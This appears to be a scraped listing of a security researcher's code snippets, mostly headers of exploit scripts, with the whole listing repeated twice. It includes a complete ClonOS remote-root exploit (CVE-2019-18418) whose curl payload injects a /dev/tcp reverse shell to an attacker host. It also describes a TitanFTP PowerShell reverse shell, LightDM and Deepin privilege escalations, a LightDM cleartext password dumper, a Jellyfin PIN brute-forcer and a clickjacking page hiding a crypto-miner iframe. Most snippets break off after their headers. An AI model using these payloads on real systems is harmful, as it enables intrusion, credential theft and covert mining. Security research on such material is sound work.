bcoles

## linux-pam-backdoor-detect.sh
#!/bin/bash
# Detect PAM backdoors created by linux-pam-backdoor:
#   https://github.com/zephrax/linux-pam-backdoor
#
# Note: this will likely only work with PAM version 1.3.0.
# ---
# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word
# Automatic PAM Backdoor
# PAM Version: 1.3.0
# Password: some_s3cr3t_p455word

## titanftp-server-admin-event-handler-rce
#!/bin/bash
# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Requires remote administration interface to be enabled. (Default port 31001/tcp).
# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
# ---
# $ ./titanftp-server-admin-event-handler-rce
# TitanFTP Server Administrator Event Handler Authenticated RCE
#
# Generating PowerShell reverse shell to 172.16.191.165:1337 ...

## clonos-root-rce.sh
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first

RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337

curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"

## jellyfin-brute.rb
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force                                      #
#                                                                              #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2.   #
# This will likely also work on Emby Media Server, but untested.               #
#                                                                              #
# Note: cURL must be installed and in $PATH                                    #
#                                                                              #
# Note: Upon successful expoitation, the password will be reset for all users, #

## lightdmpwn.sh
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,

## lastore-daemon-root.sh
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/

## lightdmdump
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490

## crt.sh
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'

error() {
  echo "[ERROR] $*"
  exit 1
}

## fuzz.rb
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files    #
# ----------------------------------------------- #
#                                                 #
# Each test case is written to 'fuzz.pdf' in the  #
# current working directory.                      #
#                                                 #
# Crashes and the associated backtrace are saved  #

## clickjack-authedmine.html
<html>
  <body>
    <div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
      <iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
    </div>
  </body>

  <script>
  window.onmousemove = function(e) {
    var container = document.getElementById("container");
	#!/bin/bash
	# Detect PAM backdoors created by linux-pam-backdoor:
	# https://github.com/zephrax/linux-pam-backdoor
	#
	# Note: this will likely only work with PAM version 1.3.0.
	# ---
	# $ ./backdoor.sh -v 1.3.0 -p some_s3cr3t_p455word
	# Automatic PAM Backdoor
	# PAM Version: 1.3.0
	# Password: some_s3cr3t_p455word
	#!/bin/bash
	# titanftp-server-admin-event-handler-rce - TitanFTP Server Administrator Event Handler Authenticated RCE
	#
	# Requires remote administration interface to be enabled. (Default port 31001/tcp).
	# Creates a new server and adds an event handler to execute a PowerShell reverse shell.
	# ---
	# $ ./titanftp-server-admin-event-handler-rce
	# TitanFTP Server Administrator Event Handler Authenticated RCE
	#
	# Generating PowerShell reverse shell to 172.16.191.165:1337 ...
	#!/bin/bash
	# clonos-root-rce
	# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
	# Note: Start netcat listener on LHOST:LPORT first

	RHOST="172.16.191.240"
	LHOST="172.16.191.165"
	LPORT=1337

	curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
	#!/usr/bin/env ruby
	################################################################################
	# Jellyfin Password Reset PIN Brute Force #
	# #
	# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
	# This will likely also work on Emby Media Server, but untested. #
	# #
	# Note: cURL must be installed and in $PATH #
	# #
	# Note: Upon successful expoitation, the password will be reset for all users, #
	#!/bin/bash
	# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
	# ---
	# Usage: ./lightpwn
	# A LightDM session is required. Exploitation will lock the current session,
	# and could take several minutes. It usually takes about a minute.
	# When the screen stops flashing, unlock the session and run: /bin/subash
	# ---
	# There's nothing new or special about this exploit.
	# It's simply a slightly more weaponised version of the original PoC,
	#!/bin/bash
	# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
	#
	# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
	# in the sudo group to install arbitrary packages without providing a password,
	# resulting in code execution as root. By default, the first user created on
	# the system is a member of the sudo group.
	# ~ bcoles
	#
	# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
	#!/bin/bash
	# lightdmdump
	# ---
	# Dump clear text passwords from lightdm sessions on Ubuntu
	# Requires root privileges to dump lightdm process memory
	# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
	# ---
	# Bug discovered by: Sven Blumenstein
	# Disclosure date: 2017-09-15
	# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
	#!/bin/bash
	# List sub-domains using crt.sh
	set -euo pipefail
	IFS=$'\n\t'

	error() {
	echo "[ERROR] $*"
	exit 1
	}
	#!/usr/bin/env ruby
	###################################################
	# ----------------------------------------------- #
	# Fuzz Origami Ruby gem with mutated PDF files #
	# ----------------------------------------------- #
	# #
	# Each test case is written to 'fuzz.pdf' in the #
	# current working directory. #
	# #
	# Crashes and the associated backtrace are saved #
	<html>
	<body>
	<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
	<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
	</div>
	</body>

	<script>
	window.onmousemove = function(e) {
	var container = document.getElementById("container");